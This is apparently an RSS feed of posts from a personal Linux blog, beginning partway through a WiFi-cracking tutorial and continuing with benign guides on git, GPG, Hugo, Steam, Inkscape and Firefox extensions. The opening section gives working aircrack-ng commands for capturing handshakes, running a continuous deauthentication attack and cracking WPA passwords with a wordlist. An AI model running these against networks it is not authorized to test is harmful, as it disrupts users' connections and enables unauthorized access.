airodump-ng --bssid [BSSID] -c [channel] -w [capture filename] wlan0mon
```
![Creating Cap file](./capfile.gif)
![Creating Cap file-2](./capfile-2.gif)
![file](./file.gif)

## Step 6: Performing Deauthentication Attack

This will fucking disconnect clients from that WiFi network, and we try to capture the handshake as they reconnect. The handshake or PMKID is necessary to crack the WiFi password. You can also take the captured handshake to other tools, such as hashcat, to crack the password.

```shell
aireplay-ng --deauth 0 -a [BSSID] wlan0mon
```
![Device deauth](./handshake.gif)

## Step 7: Cracking the Password

Once you&apos;ve captured the handshake or PMKID, use Aircrack-ng to crack the WiFi password:

```shell
aircrack-ng [capture filename] -w [password list file]
```

![Cracking password](./cracking.png)
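
WPA/WPA2 passphrases are 8 to 63 characters long, so filtering the wordlist first avoids wasted attempts. A small sketch (the inline words are only examples; pipe your real wordlist instead):

```shell
# Drop wordlist entries that cannot be valid WPA passphrases (8-63 chars).
printf '%s\n' short secret12 averylongpassphrase | grep -E '^.{8,63}$'
```

Only `secret12` and `averylongpassphrase` survive the filter; `short` is too short to be a WPA passphrase.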

## Final Step: Closing Monitor Mode

After you&apos;ve finished testing the network security, stop the monitor mode on your wireless interface, and now your network connection will be back.

```shell
airmon-ng stop wlan0mon
```
![Stop Monitor Mode](./stop.png)</content:encoded><author>UmmIt Kin &lt;root@ummit.dev&gt;</author></item><item><title>How to Edit Git Commit Messages</title><link>https://ummit.dev//posts/linux/tools/git/git-edit-git-commit-messages/</link><guid isPermaLink="true">https://ummit.dev//posts/linux/tools/git/git-edit-git-commit-messages/</guid><description>Modify Git commit messages using interactive rebase for cleaner repository history and better documentation.</description><pubDate>Thu, 30 May 2024 00:00:00 GMT</pubDate><content:encoded>## Introduction

In the world of version control, mistakes happen – including in commit messages. Fortunately, Git provides a straightforward way to correct those messages, whether it&apos;s the first commit or any commit in your repository. Here&apos;s a step-by-step guide to editing Git commit messages:

### Step 1: Navigate to Your Repository Directory

Use the `cd` command to navigate to the directory where your Git repository resides. Ensure you&apos;re in the correct location to make the changes you need.

### Step 2: Initiate an Interactive Rebase

Start an interactive rebase by entering the following command:

```bash
git rebase -i --root
```

Using `--root` in the command instructs Git to start an interactive rebase from the very first commit in your repository, allowing you to review and edit all commits. If you want to edit specific commits, you can replace `--root` with `HEAD~n`, where `n` is the number of commits you want to edit. For example, to edit the last three commits, you can use `HEAD~3`.
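
As a side note, if only the most recent commit message needs fixing, `git commit --amend -m` is simpler than an interactive rebase. A self-contained sketch in a throwaway repository (safe to run anywhere; the repo lives in a temp directory, and the identity flags are placeholder values):

```shell
# Create a disposable repo, make a commit with a bad message, then amend it.
tmp=$(mktemp -d)
cd "$tmp"
git init -q
git -c user.name=demo -c user.email=demo@example.com commit -q --allow-empty -m "typo mesage"
git -c user.name=demo -c user.email=demo@example.com commit -q --amend --allow-empty -m "fixed message"
git log --format=%s
```

Like `reword`, amending rewrites the commit, so a force push is still required if the old commit was already published.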

### Step 3: Mark the Commits for Editing

Git will open a text editor displaying a list of commits. For each commit you want to edit, change the word `pick` to `reword` or simply `r` at the beginning of the corresponding line. This indicates that you want to edit the commit message.

### Step 4: Save and Exit

Save your changes and exit the text editor.

- Vim: `:wq`
- nano: `Ctrl+S`, then `Ctrl+X`

### Step 5: Edit the Commit Messages

Git will pause at each commit marked for editing. For each paused commit, Git will open the text editor, allowing you to modify the commit message. Make your desired changes, then save and exit the text editor.

### Step 6: Complete the Rebase

After editing all desired commit messages, Git will continue with the rebase process, applying your changes.

### Step 7: Force Push Your Changes

You&apos;ll need to force push the changes to update the history. Use the following command:

```bash
git push origin master --force
```

### Well done!

With these steps, you can confidently edit Git commit messages whenever needed, ensuring your repository&apos;s history remains accurate and well-documented.</content:encoded><author>UmmIt Kin &lt;root@ummit.dev&gt;</author></item><item><title>Fixing Slow Downloading on Steam for Linux: A Quick Guide</title><link>https://ummit.dev//posts/games/steam/fix-show-downloading-on-liunx/</link><guid isPermaLink="true">https://ummit.dev//posts/games/steam/fix-show-downloading-on-liunx/</guid><description>Fix slow Steam download speeds on Linux by disabling HTTP/2 and optimizing connection settings.</description><pubDate>Mon, 01 Jan 2024 00:00:00 GMT</pubDate><content:encoded>## Introduction

Are you tired of sluggish download speeds on Steam while using Linux? Don&apos;t worry; there&apos;s a solution! In this quick guide, we&apos;ll walk through the steps to fix slow downloading on Steam for Linux.

## Editing Steam&apos;s Configuration File

1. Open the Steam configuration file using your preferred text editor. Let&apos;s use `nvim` for this example:

```shell
nvim ~/.steam/steam/steam_dev.cfg
```

2. Add the following lines to the configuration file:

```shell
@nClientDownloadEnableHTTP2PlatformLinux 0
@fDownloadRateImprovementToAddAnotherConnection 1.0
```

3. Save the changes and exit the text editor.

4. Restart Steam and try downloading the game again. You should see a big change in speed, as shown in the image below:

![Speed](./featured.png)
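
The manual edit above can also be scripted. A sketch that appends both settings only if they are missing (this assumes the default `~/.steam` path from step 1; Flatpak installs keep the file elsewhere):

```shell
# Append the two settings only if they are not already present.
cfg="$HOME/.steam/steam/steam_dev.cfg"
mkdir -p "$(dirname "$cfg")"
grep -qs nClientDownloadEnableHTTP2PlatformLinux "$cfg" || {
  echo '@nClientDownloadEnableHTTP2PlatformLinux 0' >> "$cfg"
  echo '@fDownloadRateImprovementToAddAnotherConnection 1.0' >> "$cfg"
}
```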

## How It Works

### 1. HTTP/2 on Linux

The first line, `@nClientDownloadEnableHTTP2PlatformLinux 0`, disables the use of HTTP/2 for downloads on the Linux platform. While HTTP/2 is generally more efficient, some users have reported issues with Steam&apos;s implementation on Linux. Disabling it might help fix slow downloading problems.

### 2. Download Rate Improvement

The second line, `@fDownloadRateImprovementToAddAnotherConnection 1.0`, adjusts the download rate improvement by allowing Steam to add another connection. This tweak can be particularly beneficial for users with high-speed internet connections, as it enables Steam to utilize additional connections, potentially resolving slow downloading issues.

Concretely, a value of `1.0` lets Steam open additional connections to download servers (it usually uses around 3, with a hard cap of 10 in the code), which can theoretically improve download speeds.

## References

- [Steam Download Speed is so slow on Linux](https://gist.github.com/FikriRNurhidayat/ce18426ad94fff2140538c0adf0e06ec)
- [Steam Downloads Slow On Linux?! FIX IT](https://iv.datura.network/watch?v=A_kRdad3eb4)
- [Slow steam downloads? Try this!](https://old.reddit.com/r/linux_gaming/comments/16e1l4h/slow_steam_downloads_try_this/)</content:encoded><author>UmmIt Kin &lt;root@ummit.dev&gt;</author></item><item><title>Good Bye 2023: Essential Linux Terminal Tools for Linux Geeks</title><link>https://ummit.dev//posts/linux/tools/geek-tools/</link><guid isPermaLink="true">https://ummit.dev//posts/linux/tools/geek-tools/</guid><description>Collection of powerful command-line tools for Linux including terminal emulators, file managers, and productivity utilities.</description><pubDate>Sun, 31 Dec 2023 00:00:00 GMT</pubDate><content:encoded>## Good-bye 2023 :o

Today is January 1, 2024, and this is the first post in 2024 that will be useful for end users.

As we all know, we hardly need a GUI in our lives; the terminal can do everything.

First-class basic commands like `ls`, `pwd`, `cd`, `lsblk`, `gdisk`, `fdisk`, `ps`, `pkill`... I won&apos;t go into details here; you should already be familiar with these tools.

BTW, this post just popped into my head on 2023-12-31 at around 11:55, as a useful article for 2024-01-01 :d. Now, let&apos;s fire up the terminal geek tools :p

### 1. Viu - Visual Image Delight

Viu, a terminal image viewer. Perfect for those moments when you want to sneak a quick peek at images without leaving the command line.

```shell
sudo pacman -S viu
```

![viu](./viu.png)

### 2. Htop and Btop - Task Management Unleashed

Htop and btop are your dynamic duo for advanced task management. Real-time updates and an intuitive interface make monitoring and managing processes a breeze.

```shell
sudo pacman -S htop btop
```

![htop](./htop.png)

### 3. Neovim and Vim - Text Editing Wizards

Neovim and Vim redefine text editing in the terminal. Packed with features and extensibility, they&apos;re more than just text editors—they&apos;re lifestyle choices.

```shell
sudo pacman -S neovim
```

![neovim](./neovim.png)

### 4. LF - File Navigation Bliss
LF, your trusty file manager, simplifies navigating directories with style. Say goodbye to tedious file manipulation and hello to efficiency.

```shell
sudo pacman -S lf
```

![lf](./lf.png)

### 5. Media Magic Trio - FFMPEG, yt-dlp, Inkscape

For multimedia tasks, FFMPEG for conversion, yt-dlp for downloads, and Inkscape for vector graphics are your command-line companions.

```shell
sudo pacman -S ffmpeg yt-dlp inkscape
```

### 6. Zsh and Oh My Zsh - Shell Brilliance
Zsh, the powerhouse shell, gets a boost with Oh My Zsh. Themes, plugins, and a wealth of features turn your terminal into a personalized haven.

```shell
sudo pacman -S zsh
```

### 7. Kitty and Kitten - GPU-Powered Terminal
Kitty, a GPU-based terminal emulator, and its companion Kitten with high-quality display pictures bring modern features and visual appeal to your terminal.

```shell
sudo pacman -S kitty
```

### 8. Ncdu - Disk Space Enlightenment
Ncdu, the disk usage analyzer, transforms complex disk statistics into an interactive and easy-to-understand display.

```shell
sudo pacman -S ncdu
```

![ncdu](./ncdu.png)

### 9. Hollywood - Terminal Fun
Hollywood adds a touch of entertainment with cool effects inspired by movie and TV hacking scenes. It&apos;s not just about productivity; it&apos;s about having fun in the terminal.

```shell
yay -S hollywood
```

![hollywood](./hollywood.png)

## End of 2023

After getting used to using the terminal for everything, a GUI really isn&apos;t necessary anymore :D</content:encoded><author>UmmIt Kin &lt;root@ummit.dev&gt;</author></item><item><title>Mirroring Hugo site: with subdomain GitLab and Cloudflare and more</title><link>https://ummit.dev//posts/web/hugo/hugo-mirroring-pages/</link><guid isPermaLink="true">https://ummit.dev//posts/web/hugo/hugo-mirroring-pages/</guid><description>Deploy Hugo static sites across multiple platforms using GitLab Pages and Cloudflare Pages with dynamic baseURL configuration.</description><pubDate>Sun, 31 Dec 2023 00:00:00 GMT</pubDate><content:encoded>## Introduction

When mirroring your Hugo site with GitLab and Cloudflare, ensuring that the site is fully functional is crucial. The build process depends on the `baseURL` configuration in your Hugo `config.yaml`. To make this work seamlessly, you need to adjust the build command for both GitLab Pages and Cloudflare Pages. This guide walks you through the process.

## Cloudflare Pages

Cloudflare Pages automatically follows your GitLab or GitHub repository. Here are the steps to set it up:

### Step 1: Adding Environment (Optional)

To manage your domain effectively, consider adding an environment variable:

1. Navigate to Worker &amp; Pages -&gt; Settings -&gt; Environment variables.
2. Add the variable:
   - Variable name: `CF_PAGES_URL`
   - Value: Your Cloudflare Pages domain.

### Step 2: Build Command

Adjust the build command to include the `baseURL` when building the Hugo site:

1. Navigate to Builds &amp; Deployments -&gt; Build Configurations -&gt; Edit Configurations.
2. Update the Build command:
   ```shell
   hugo --baseURL $CF_PAGES_URL
   ```
   ![Hugo Build Cloudflare Pages](./CF.png)

## GitLab Pages

For GitLab Pages, you can use CI/CD GitLab Actions. Here is an example of a GitLab CI configuration for Hugo:

```yaml
default:
  image: &apos;${CI_TEMPLATE_REGISTRY_HOST}/pages/hugo:0.121.1&apos;

variables:
  GIT_SUBMODULE_STRATEGY: recursive
  GL_PAGES_URL: domain.com

pages:
  script:
    - hugo -b $GL_PAGES_URL
  artifacts:
    paths:
      - public
  rules:
    - if: $CI_COMMIT_BRANCH == $CI_DEFAULT_BRANCH
  environment: production
```

This configuration ensures that the `baseURL` is correctly set during the Hugo build process for GitLab Pages.

## GitHub

Coming soon ...

```yaml
git:
  depth: false

env:
  global:
    - HUGO_VERSION=&quot;0.121.1&quot;
  matrix:
    - YOUR_ENCRYPTED_VARIABLE

install:
  - wget -q https://github.com/gohugoio/hugo/releases/download/v${HUGO_VERSION}/hugo_${HUGO_VERSION}_Linux-64bit.tar.gz
  - tar xf hugo_${HUGO_VERSION}_Linux-64bit.tar.gz
  - mv hugo ~/bin/

script:
  - hugo -b $GH_PAGES_URL

deploy:
  provider: pages
  skip-cleanup: true
  github-token: $GITHUB_TOKEN
  keep-history: true
  local-dir: public
  repo: gh-username/gh-username.github.io
  target-branch: master
  verbose: true
  on:
    branch: master
```

## Conclusion

By following these steps for both Cloudflare Pages and GitLab Pages, you ensure that your Hugo site is mirrored and built correctly with the specified `baseURL`, resulting in a fully functional and mirrored website.

## References

- [CI/CD YAML syntax reference](https://docs.gitlab.com/ee/ci/yaml/#variables)
- [How to Set Variables In Your GitLab CI Pipelines](https://www.howtogeek.com/devops/how-to-set-variables-in-your-gitlab-ci-pipelines/)
- [Define a CI/CD variable in the .gitlab-ci.yml file](https://docs.gitlab.com/ee/ci/variables/#define-a-cicd-variable-in-the-gitlab-ciyml-file)
- [Deploy with Cloudflare Pages](https://developers.cloudflare.com/pages/framework-guides/deploy-a-hugo-site/#deploy-with-cloudflare-pages)</content:encoded><author>UmmIt Kin &lt;root@ummit.dev&gt;</author></item><item><title>Editing GPG Key Information</title><link>https://ummit.dev//posts/linux/tools/gpg/gpg-editing-information/</link><guid isPermaLink="true">https://ummit.dev//posts/linux/tools/gpg/gpg-editing-information/</guid><description>Update GPG key details including email addresses, user names, and expiration dates using command-line tools.</description><pubDate>Sun, 31 Dec 2023 00:00:00 GMT</pubDate><content:encoded>## Introduction

First of all, Happy New Year!! :3 This is the first post for the last day of 2023 :D **2023-12-31**

**Updating Email, User Name, or Expiry Date**: Here&apos;s a simple guide on how to edit details like email, user name, and expiry date.

&gt;**Note:** When updating email information, ensure you add a new email before attempting to delete the old one. This maintains the key&apos;s integrity and allows for a smooth transition.

### **Step 1: Find the Key ID**
   Start by identifying the key ID using the following command:
   ```shell
   gpg --list-secret-keys --keyid-format=long
   ```

### **Step 2: Edit the Key**
   Enter the GPG key editing mode with the key ID:
   ```shell
   gpg --edit-key &lt;ID&gt;
   ```
   On the GnuPG prompt, proceed to the next steps.

### **Step 3: Adding a New Email and Deleting the Old One**
   Inside the GnuPG prompt:
   ```shell
   gpg&gt; adduid
   ```
   Follow the interactive prompts to provide the new details. Confirm and enter the passphrase when prompted. Save the changes:
   ```shell
   gpg&gt; save
   ```
   To delete the old email, ensure you have added a new email first:
   ```shell
   gpg&gt; deluid
   ```

### **Step 4: Updating Expiry Date**
   To change the expiry date:
   ```shell
   gpg&gt; expire
   ```
   Follow the interactive prompts for details. To modify the ssb (subkey) expiry date, select the subkey first (for example, key 1):
   ```shell
   gpg&gt; key 1
   gpg&gt; expire
   ```
   Adjust the date and save:
   ```shell
   gpg&gt; save
   ```

### **Step 5: Verify Changes**
   Confirm that the changes are correct by checking the signed commit messages:
   ```shell
   git log --show-signature
   ```

## Conclusion

This step-by-step guide helps you confidently navigate the process of editing GPG key information, whether you need to update your email, user name, or expiry date.

## Reference

- [Can I add an email address to an existing GPG key?](https://security.stackexchange.com/questions/261467/can-i-add-an-email-address-to-an-existing-gpg-key)</content:encoded><author>UmmIt Kin &lt;root@ummit.dev&gt;</author></item><item><title>Mirroring Codeberg, Gitea, Gitlab and Github Workflows</title><link>https://ummit.dev//posts/linux/tools/git/git-devsecops-mirroring/</link><guid isPermaLink="true">https://ummit.dev//posts/linux/tools/git/git-devsecops-mirroring/</guid><description>Set up automated repository mirroring between GitHub, GitLab, Codeberg, and other Git platforms for redundancy.</description><pubDate>Thu, 28 Dec 2023 00:00:00 GMT</pubDate><content:encoded>## Introduction

Setting up a mirrored repository simplifies collaboration and enhances version control. Here&apos;s a straightforward guide to help you get started:

&gt;This article focuses on my workflow: Codeberg as the main repository and GitLab as the mirror. Other platforms differ only slightly, and you can easily find the relevant section.

### Step 1 - Generate an Access Token

Obtain an access token from your target DevSecOps platform, such as GitLab, GitHub, or others. For GitLab, you can use [this URL](https://gitlab.com/-/user_settings/personal_access_tokens). Ensure that the token has all the necessary scopes, considering this repository is under your full control.

### Step 2 - Configure Mirror Settings

Navigate to the settings of your existing code repository on Codeberg. Look for the `Mirror Setting` section.

- **Git Remote Repository URL:** Provide the remote URL of your empty mirror repository.
- **Authorization:** Enter the username of your mirror repository and the access token key associated with the account.
- **Sync when commits are pushed:** Enable this option for automatic synchronization when commits are pushed to the source repository.
- **Mirror Interval:** Choose a suitable interval for syncing. The default is often set to 8 hours.

![Mirror-Setting](./Mirror-Settings.png)

### Step 3 - Add Push Mirror

Once you&apos;ve ensured that all the information is correct, click on &quot;Add Push Mirror.&quot;

### Step 4 - Initiate Synchronization

Click `Synchronize` to force a sync for the first time. Be patient and wait a few minutes.

### Step 5 - Verification

Check your GitLab mirror repository. You should observe the source tree syncing with the mirrored repository, indicating a successful setup.

Now, with these steps, you&apos;ve established a mirrored repository, enhancing the efficiency of your DevSecOps workflow. Enjoy seamless collaboration and version control!

## Conclusion

Remember: the platform hosting your source code is where you enter the access token for your other DevSecOps account. Once you have entered it correctly, go back to the mirror settings to check the status. If anything went wrong, you will see a corresponding error, which usually means a value was entered incorrectly; just check it again.

Ensure the security of your commits by following these simple steps to set up GPG key signing. Add an extra layer of protection to your Git repositories with this quick and easy guide.

### Step 1: Install Necessary Packages

Start by installing the required packages, GnuPG, and pinentry:

```shell
sudo pacman -S gnupg pinentry
```

### Step 2: Generate a GPG Keypair

Generate a GPG keypair with the following command. Follow the prompts and enter information consistent with your GitHub/GitLab/Codeberg/Gitea account:

```shell
gpg --full-generate-key
```

- Choose RSA for enhanced security.
- Opt for a key size of 4096 for better security.
- Set the key expiration (0 for no expiration).
- Enter information matching your account details.
- Set a passphrase for the GPG keys.

### Step 3: Retrieve the Public Key

Get your GPG key&apos;s information using the following command:

```shell
gpg --list-secret-keys --keyid-format LONG
```

Copy the GPG key ID (the `sec` value, not `ssb`). Now, obtain the PGP Public Key:

```shell
gpg --armor --export &lt;GPG_KEY_ID&gt;
```

Copy the displayed GPG Public key.

### Step 4: Add GPG Key to Your Account

Across Git hosting platforms (GitHub, GitLab, Codeberg, Gitea), the steps are essentially the same: log in to your account, navigate to the GPG keys section, and paste the GPG public key.

### Step 5: Verify Your Public GPG Key

In the same section, find a &quot;Verify&quot; button. Copy the provided command line, paste it into your terminal, copy the output, and paste it back into the verification section. Your GPG Key should now be verified.

### Step 6: TTY Session

Before proceeding, ensure the active session can use the GPG key by adding the following line to `~/.zshrc` (or `~/.bashrc` if you use Bash):

```shell
export GPG_TTY=$(tty)
```

### Step 7: Git Configuration Setup

Configure Git to use your GPG key:

```shell
git config --global user.signingkey &lt;GPG_KEY_ID&gt;
git config --global commit.gpgSign true
```

Replace `&lt;GPG_KEY_ID&gt;` with your actual GPG key ID.

### Step 8: Commit a Message

When committing, Git will prompt for the passphrase associated with your GPG key, adding an extra layer of security:

```shell
git commit -S -m &quot;commit message&quot;
```

To confirm the commit was signed with the expected key, run `git log --show-signature -1` and check that it reports a good signature.

## References

- [7.4 Git Tools - Signing Your Work](https://git-scm.com/book/en/v2/Git-Tools-Signing-Your-Work)
- [Unable to generate a key with GnuPG (agent_genkey failed: No such file or directory)](https://superuser.com/questions/1660466/unable-to-generate-a-key-with-gnupg-agent-genkey-failed-no-such-file-or-direct)
- [Adding a GPG key to your account](https://docs.codeberg.org/security/gpg-key/)
- [gnupg2: gpg: public key decryption failed: Inappropriate ioctl for device #14737](https://github.com/Homebrew/homebrew-core/issues/14737)
- [GnuPG](https://wiki.archlinux.org/title/GnuPG)</content:encoded><author>UmmIt Kin &lt;root@ummit.dev&gt;</author></item><item><title>Firefox Plug-ins to Enhance Your Browser&apos;s Appearance</title><link>https://ummit.dev//posts/browser/extensions/web-extensions-theme/</link><guid isPermaLink="true">https://ummit.dev//posts/browser/extensions/web-extensions-theme/</guid><description>Customize Firefox appearance with themes and dark mode extensions for comfortable browsing experience.</description><pubDate>Tue, 26 Dec 2023 00:00:00 GMT</pubDate><content:encoded>## Introduction

Today, we will explore plug-ins that can enhance the aesthetics of your browser: themes and color schemes.

### [Firefox Color](https://addons.mozilla.org/zh-TW/firefox/addon/firefox-color/)

Create a unique and visually appealing look for your Firefox browser with Firefox Color. This plug-in allows you to easily build, save, and share beautiful themes. Customize colors and elements to transform your browser into your preferred style.

See the source code on [GitHub](https://github.com/mozilla/FirefoxColor).

![Firefox Color](https://addons.mozilla.org/user-media/previews/full/216/216725.png?modified=1622133685)

### [Dark Reader](https://addons.mozilla.org/en-US/firefox/addon/darkreader/)

Aka Dark Mode only. For those who prefer a darker interface like me. Dark Reader is a popular plug-in that enables dark mode on websites, reducing eye strain and enhancing readability. It offers customizable settings to adjust brightness, contrast, and sepia levels to suit your preferences.

See the source code on [GitHub](https://github.com/darkreader/darkreader).

![Dark Reader](https://addons.mozilla.org/user-media/previews/full/201/201070.png?modified=1638883247)

## Conclusion

Your eye health is important, and these plug-ins can help you create a visually comfortable browsing experience, whether you prefer dark mode or a custom theme. :)</content:encoded><author>UmmIt Kin &lt;root@ummit.dev&gt;</author></item><item><title>Converting SVG to PNG with Inkscape</title><link>https://ummit.dev//posts/linux/tools/inkscape/</link><guid isPermaLink="true">https://ummit.dev//posts/linux/tools/inkscape/</guid><description>Convert SVG vector graphics to PNG format using Inkscape command-line tools with custom dimensions.</description><pubDate>Tue, 26 Dec 2023 00:00:00 GMT</pubDate><content:encoded>## Introduction

If you&apos;re looking to convert SVG (Scalable Vector Graphics) files to PNG (Portable Network Graphics) format, Inkscape provides a powerful and straightforward solution. In this guide, we&apos;ll explore a simple command-line approach using Inkscape, a vector graphics editor, to achieve this conversion.

## Prerequisites

Install Inkscape with the following command (shown here for Arch Linux):

```shell
sudo pacman -S inkscape
```

## SVG to PNG Conversion

To convert an SVG file to PNG using Inkscape, use the following command:

```shell
inkscape -w 1024 -h 1024 input.svg -o output.png
```

- **-w**: Specifies the width of the output PNG file (1024 pixels in this example).
- **-h**: Specifies the height of the output PNG file (1024 pixels in this example).
- **input.svg**: The input SVG file you want to convert.
- **-o output.png**: The name of the output PNG file.

Adjust the width and height values according to your preferences. Note that specifying both `-w` and `-h` forces those exact dimensions; to preserve the original aspect ratio, specify only one of them and let Inkscape compute the other.

## Example

Let&apos;s say you have an SVG file named `example.svg`. To convert it to a 1024x1024 PNG file, run:

```shell
inkscape -w 1024 -h 1024 example.svg -o example.png
```

This command will generate a PNG file (`example.png`) with a width and height of 1024 pixels each.

## Batch Conversion

For batch processing multiple SVG files, you can use a loop in the command line or a script. For instance, using a loop in shell:

```shell
for file in *.svg; do
    inkscape -w 1024 -h 1024 &quot;$file&quot; -o &quot;${file%.svg}.png&quot;
done
```

This loop iterates through all SVG files in the current directory, converts each to a 1024x1024 PNG file, and replaces the `.svg` extension with `.png` in the output filenames.
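If the `${file%.svg}` expansion is unfamiliar: `%` removes the shortest matching suffix, so the `.svg` extension is stripped before `.png` is appended. A quick check with `echo` (the filename is just an example):

```shell
# "%" strips the shortest matching suffix, here ".svg"
file="logo.svg"
out="${file%.svg}.png"
echo "$out"   # logo.png
```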

## Conclusion

With this straightforward approach, you can effortlessly convert SVG files to PNG using Inkscape, with the flexibility to tailor the output dimensions to your specific needs.

## Reference

- [How to convert a SVG to a PNG with ImageMagick?](https://stackoverflow.com/questions/9853325/how-to-convert-a-svg-to-a-png-with-imagemagick)</content:encoded><author>UmmIt Kin &lt;root@ummit.dev&gt;</author></item><item><title>Structuring and Preparing Your Blog for Hugo Themes</title><link>https://ummit.dev//posts/web/hugo/merge-into-good-markdown-structure/</link><guid isPermaLink="true">https://ummit.dev//posts/web/hugo/merge-into-good-markdown-structure/</guid><description>Organize and restructure blog content for Hugo theme migration with proper file naming and thumbnail management.</description><pubDate>Tue, 26 Dec 2023 00:00:00 GMT</pubDate><content:encoded>## Introduction

When transitioning to a new Hugo theme, it&apos;s essential to have a well-organized blog structure. This guide will help you merge all your files into a format suitable for the new Hugo theme.

## Step 1: Renaming Markdown Files

Start by renaming all your Markdown files to `index.md` for a cleaner structure. Execute the following command in your blog&apos;s root directory:

```bash
find . -type f -name &quot;*.md&quot; -exec bash -c &apos;mv &quot;$0&quot; &quot;${0%/*}/index.md&quot;&apos; {} \;
```

This simplifies your file structure and aligns it with Hugo&apos;s expectations.
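Because this rename is destructive, you may want to preview it first. A hedged dry-run variant that only prints the `mv` commands, demonstrated here against a throwaway directory (the post name is made up for illustration):

```shell
# Build a scratch directory with one Markdown file, then print the
# rename that the one-liner above would perform, without moving anything
tmpdir=$(mktemp -d)
mkdir -p "$tmpdir/posts/my-post"
touch "$tmpdir/posts/my-post/my-post.md"
preview=$(cd "$tmpdir" && find . -type f -name "*.md" \
    -exec bash -c 'echo mv "$0" "${0%/*}/index.md"' {} \;)
echo "$preview"
rm -rf "$tmpdir"
```

Once the printed commands look right, drop the `echo` to perform the renames for real.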

## Step 2: Managing Thumbnails

For thumbnails, ensure they are named as `featured.*` for compatibility with your Hugo theme. If your `index.md` files include URLs for thumbnails, you can use the following script to download and rename them:

```bash
#!/bin/bash

find . -type f -name &quot;index.md&quot; -exec awk &apos;NR&lt;=10 &amp;&amp; /thumbnail: .+/{print $2, FILENAME}&apos; {} \; | while read -r url filepath; do
    if [[ $url == https* ]]; then
        url=$(echo &quot;$url&quot; | tr -d &apos;[:space:]&apos;)
        filename=$(basename &quot;$url&quot;)
        dirpath=$(dirname &quot;$filepath&quot;)

        cd &quot;$dirpath&quot; || exit
        wget &quot;$url&quot; -O &quot;./featured.${filename##*.}&quot;

        if [ $? -eq 0 ]; then
            echo &quot;Downloaded and renamed to featured.${filename##*.}&quot;
        else
            echo &quot;Failed to download $filename&quot;
        fi

        cd - || exit
    else
        echo &quot;Skipping non-HTTPS URL: $url&quot;
    fi
done
```

&gt;Note: Place this script in your blog&apos;s root directory and run it to download and rename the thumbnails.

Afterwards, double-check the downloaded files to confirm they are what you expected, since this script may overwrite existing files.

## Step 3: Verify and Adjust

Review your blog&apos;s content and ensure all links, images, and references are intact. Adjust any broken links or missing images.

## Step 4: Test with the New Theme

Finally, test your blog with the new Hugo theme. Use Hugo&apos;s built-in server for local testing:

```bash
hugo server --watch --loglevel debug
```

Visit `http://localhost:1313` in your browser to see how your blog looks with the new theme.

## Source code

The source code for these can also be found in my repositories! Please check out: https://codeberg.org/UmmIt/Markhugo</content:encoded><author>UmmIt Kin &lt;root@ummit.dev&gt;</author></item><item><title>Git: Configurations Settings</title><link>https://ummit.dev//posts/linux/tools/git/git-global-local-settings/</link><guid isPermaLink="true">https://ummit.dev//posts/linux/tools/git/git-global-local-settings/</guid><description>Manage Git global and local configurations for different identities across multiple repositories and projects.</description><pubDate>Tue, 26 Dec 2023 00:00:00 GMT</pubDate><content:encoded>## Introduction

When working with Git, managing configurations is crucial for a seamless development experience. This guide explores setting up local and global configurations and provides a list of configurations for your reference.

## Global Configuration

Global configurations apply to all repositories on your machine. They are useful for providing default identities for repositories without a local configuration. Set up global configurations with the following commands:

```shell
git config --global user.name &quot;Username&quot;
git config --global user.email &quot;email@email.com&quot;
```

Replace `Username` and `email@email.com` with the desired global username and email address.

## Local Configuration

Local configurations are specific to a particular Git repository. To set up a local configuration for a repository, navigate to the repository&apos;s directory and run the following commands:

```shell
git config --local user.name &quot;Username&quot;
git config --local user.email &quot;email@email.com&quot;
```

Replace `Username` and `email@email.com` with the desired local username and email address for the repository.

### Verify Configurations

To confirm your configurations, you can use the following commands:

```shell
git config --local --get user.name
git config --local --get user.email
```

Use `--global` instead of `--local` to check the global configurations:

```shell
git config --global --get user.name
git config --global --get user.email
```

### Full Config List

To view the complete list of configurations, use:

```shell
git config --list
```

This command displays all configurations, including user name, email, aliases, and other settings.
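To see the precedence concretely, here is a small sketch using a throwaway repository (the identity string is a placeholder):

```shell
# In a fresh repo, a local setting wins over any global default
repo=$(mktemp -d)
git -C "$repo" init -q
git -C "$repo" config --local user.name "Work Identity"
name=$(git -C "$repo" config --get user.name)
echo "$name"   # Work Identity
rm -rf "$repo"
```

`git config --list --show-origin` additionally prints which file each value came from, which is handy when debugging precedence.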

## Conclusion

Now, when you work on a specific repository, Git will use the local configuration for that repository. For other repositories or situations where a local configuration is not available, Git will fall back to the global configuration.

This setup is handy when contributing to projects with different identities. Adjust the local configurations for each repository, and global configurations will serve as the default for repositories without a specific local configuration.

By following these steps and referring to the full config list, you can easily manage and switch between different identities when working on multiple Git repositories.

## Reference

- [How can I config two different git repo with different credentials in one system?](https://stackoverflow.com/questions/43118543/how-can-i-config-two-different-git-repo-with-different-credentials-in-one-system/)</content:encoded><author>UmmIt Kin &lt;root@ummit.dev&gt;</author></item><item><title>Firefox Plug-ins for Enhanced Developer Productivity</title><link>https://ummit.dev//posts/browser/extensions/web-extensions-dev/</link><guid isPermaLink="true">https://ummit.dev//posts/browser/extensions/web-extensions-dev/</guid><description>Essential Firefox extensions for developers including cookie management, custom styling, and technology detection tools.</description><pubDate>Mon, 25 Dec 2023 00:00:00 GMT</pubDate><content:encoded>## Introduction

In this guide we will explore the useful browser plug-ins that can enhance the productivity and efficiency of developers. These plug-ins can be very beneficial for you whether you wish to manage cookies, customize web pages, or analyze the technologies used on a website.

### [Cookie Quick Manager](https://addons.mozilla.org/zh-TW/firefox/addon/cookie-quick-manager/)

Cookie Quick Manager is a plug-in designed to manage cookies effectively. It offers features such as viewing, searching, creating, editing, deleting, backing up, restoring, and preventing deletion of cookies.

See the source code on [GitHub](https://github.com/ysard/cookie-quick-manager).

![Cookie Quick Manager](https://addons.mozilla.org/user-media/previews/full/211/211223.png?modified=1622132875)

### [Stylus](https://addons.mozilla.org/zh-TW/firefox/addon/styl-us/)

Stylus is a plug-in that allows you to redesign your favorite web pages. Whether installing a custom theme from an online repository or creating, editing, and managing personalized CSS stylesheets, Stylus provides granular control over the appearance of web pages.

See the source code on [GitHub](https://github.com/openstyles/stylus/).

![Stylus](https://addons.mozilla.org/user-media/previews/full/184/184538.png?modified=1622132703)

### [Wappalyzer](https://addons.mozilla.org/zh-TW/firefox/addon/wappalyzer/)

Wappalyzer is a powerful tool for identifying the technologies and frameworks used on a website. It aids developers in quickly understanding the technical components of a site.

&gt;IMPORTANT: Wappalyzer appears to have become a paid service, and its source code is no longer available on GitHub. You can still use the free version, however.

![Wappalyzer](https://addons.mozilla.org/user-media/previews/thumbs/125/125386.jpg?modified=1622132463)

### [Tampermonkey](https://addons.mozilla.org/zh-TW/firefox/addon/tampermonkey/)

